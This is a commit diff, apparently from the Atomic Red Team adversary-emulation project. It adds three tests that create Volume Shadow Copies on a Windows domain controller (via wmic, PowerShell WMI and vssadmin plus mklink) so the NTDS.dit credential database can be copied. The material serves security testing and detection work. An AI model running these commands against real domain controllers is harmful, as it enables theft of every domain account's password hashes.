new atomics (#1098)

Co-authored-by: Patrick Bareiss <pbareib@splunk.com>
2020-06-30 16:34:07 +02:00
parent 2435846063
commit f7efbc9d6a
7 changed files with 269 additions and 8 deletions
@@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th

 - [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)

+- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
+
+- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
+

 <br/>

@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller.
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

 This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-A successful test also requires the export of the SYSTEM Registry hive. 
+A successful test also requires the export of the SYSTEM Registry hive.
 This test must be executed on a Windows Domain Controller.

 **Supported Platforms:** Windows
@@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually



+<br/>
+<br/>
+
+## Atomic Test #4 - Create Volume Shadow Copy with WMI
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic shadowcopy call create Volume=#{drive_letter}
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Target must be a Domain Controller
+##### Check Prereq Commands:
+```cmd
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, Promoting this machine to a Domain Controller must be done manually
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Create Volume Shadow Copy with Powershell
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Create Symlink to Volume Shadow Copy
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+vssadmin.exe create shadow /for=#{drive_letter}
+mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+```
+
+
+
+
+
+
 <br/>
@@ -35,7 +35,7 @@ atomic_tests:
    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.

    This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-    A successful test also requires the export of the SYSTEM Registry hive. 
+    A successful test also requires the export of the SYSTEM Registry hive.
    This test must be executed on a Windows Domain Controller.
  supported_platforms:
  - windows
@@ -111,3 +111,72 @@ atomic_tests:
      rmdir /q /s #{output_folder}
    name: command_prompt
    elevation_required: true
+
+- name: Create Volume Shadow Copy with WMI
+  auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  dependencies:
+  - description: |
+      Target must be a Domain Controller
+    prereq_command: |
+      reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
+    get_prereq_command: |
+      echo Sorry, Promoting this machine to a Domain Controller must be done manually
+  executor:
+    command: |
+      wmic shadowcopy call create Volume=#{drive_letter}
+    name: command_prompt
+    elevation_required: true
+
+- name: Create Volume Shadow Copy with Powershell
+  auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  executor:
+    command: |
+      (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+    name: powershell
+    elevation_required: true
+
+- name: Create Symlink to Volume Shadow Copy
+  auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+    symlink_path:
+      description: symlink path
+      type: String
+      default: 'C:\Temp\vssstore'
+  executor:
+    command: |
+      vssadmin.exe create shadow /for=#{drive_letter}
+      mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+    name: command_prompt
+    elevation_required: true